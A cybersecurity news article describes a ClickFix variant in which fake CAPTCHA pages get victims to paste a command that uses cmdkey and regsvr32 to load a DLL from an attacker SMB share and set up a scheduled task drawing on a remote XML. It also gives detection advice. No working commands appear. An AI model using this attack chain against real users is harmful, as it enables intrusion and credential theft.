Security researchers have identified a more advanced version of the ClickFix attack that significantly raises the bar for stealth and persistence. Unlike earlier campaigns that relied heavily on PowerShell, this new variant leverages built-in Windows utilities to execute malicious activity without dropping files on disk, making detection far more difficult.
According to findings published by CyberProof’s Threat Research Team, the updated ClickFix technique replaces PowerShell with native tools such as cmdkey and regsvr32. As a result, attackers can blend their actions into normal system behavior, effectively bypassing many traditional security controls.
To begin with, the attack still relies on social engineering, a core component of previous ClickFix campaigns. However, instead of using obvious malicious scripts, attackers now lure victims through fake CAPTCHA pages designed to mimic legitimate verification systems like Cloudflare. Once users trust the page, they are instructed to open the Windows Run dialog, paste a pre-loaded command, and execute it.
From there, the attack chain unfolds quickly. First, the command uses cmdkey to store credentials for a remote server. Next, regsvr32 silently loads a malicious DLL from an attacker-controlled SMB share. Because both tools are legitimate Windows components commonly referred to as Living off the Land Binaries (LOLBins) their activity often appears harmless to endpoint detection systems.
Moreover, the attack establishes persistence in a particularly stealthy way. Once the DLL executes, it triggers a hidden process that creates a scheduled task named “RunNotepadNow.” Instead of storing task details locally, the system retrieves them from a remote XML file. Consequently, attackers can modify the second-stage payload at any time without needing to reinfect the system, ensuring long-term control with minimal footprint.
What makes this campaign especially concerning is its simplicity and effectiveness. A single pasted command is enough to initiate a multi-stage infection. Furthermore, because the entire process uses trusted system utilities, organizations relying solely on behavioral or file-based detection may fail to identify the threat.
In addition, this shift highlights a growing trend in cyberattacks: the abuse of legitimate tools to evade detection. By avoiding custom malware and instead using native binaries, attackers reduce their visibility while maintaining full control over compromised systems.
To mitigate the risk, security teams should closely monitor unusual usage of tools like cmdkey and regsvr32, particularly when they interact with external IP addresses or remote file paths. They should also implement stricter controls on outbound SMB traffic and review Task Scheduler activity for suspicious behavior. Equally important, organizations must invest in user awareness training to help employees recognize deceptive tactics such as fake CAPTCHA prompts.
Ultimately, this new ClickFix variant underscores how attackers continue to evolve their methods, forcing defenders to rethink traditional detection strategies and adopt more proactive, behavior-based security measures.
Recommended Cyber Technology News:
- Classiq Launches Expert Quantum AI Agents for Practical Applications
- Trust Stamp, Partisia, and Digital Platformer Launch Privacy-First Identity Solution
- Mythos AI Raises Global Cybersecurity and Finance Risks
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
